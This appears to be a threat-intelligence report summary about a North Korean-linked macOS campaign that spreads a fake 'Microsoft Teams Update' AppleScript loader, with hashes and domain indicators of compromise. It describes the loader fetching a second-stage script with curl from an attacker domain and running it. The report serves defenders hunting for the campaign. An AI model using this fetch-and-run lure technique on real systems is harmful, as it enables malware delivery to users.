Shares tag: macOS • Published within a month
North Korean hackers are pushing fake Microsoft Teams Update to macOS users
2025-12-04 • Moonlock •
A macOS campaign described as consistent with DPRK recruitment and crypto-targeting activity used a fake “Microsoft Teams Update” AppleScript loader named Microsoft Teams Update.scpt. The script was branded as a Microsoft Teams Live SDK update and opened a legitimate Microsoft Teams page in the background to make the activity appear normal to the user. Its malicious logic used curl -L -k to fetch a second-stage script from support.ms-live[.]com/519738/check and executed the downloaded content through AppleScript. The source provides the SHA-256 hash d4310e8286fc3e29c7dce8ed8ccffe3bbc1a38369cdeec55095d5716dd89e624 and related loader hashes, giving defenders concrete macOS artifacts for hunting.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 9135fb9e74bdb39828bfecf79194300… | 2025-12-04 | 2025-12-04 |
| HASH | 14aba88b5f87ab9415bbca855d24abc… | 2025-12-04 | 2025-12-04 |
| HASH | 81c4ce82fe26e333a46e8a3d876e35b… | 2025-12-04 | 2025-12-04 |
| HASH | d4310e8286fc3e29c7dce8ed8ccffe3… | 2025-12-04 | 2025-12-04 |
| URL | https://support.ms-live.com/519… | 2025-12-04 | 2025-12-04 |
| DOMAIN | support.ms-live.com | 2025-12-04 | 2025-12-04 |
Related Reports
2025-10-22 •
60% Match
#macOS
Shares tag: macOS • Same author: Moonlock
Shares tag: macOS • Same author: Moonlock
Shares tag: macOS
Shares tag: macOS
2026-05-28 •
45% Match
#Cryptocurrency
#Phishing
#Bluenoroff
#macOS
#SapphireSleet
#UNC1069
#T1005
#T1041
#T1560
#T1059.004
#T1059.002
#T1105
#T1543.004
Shares tag: macOS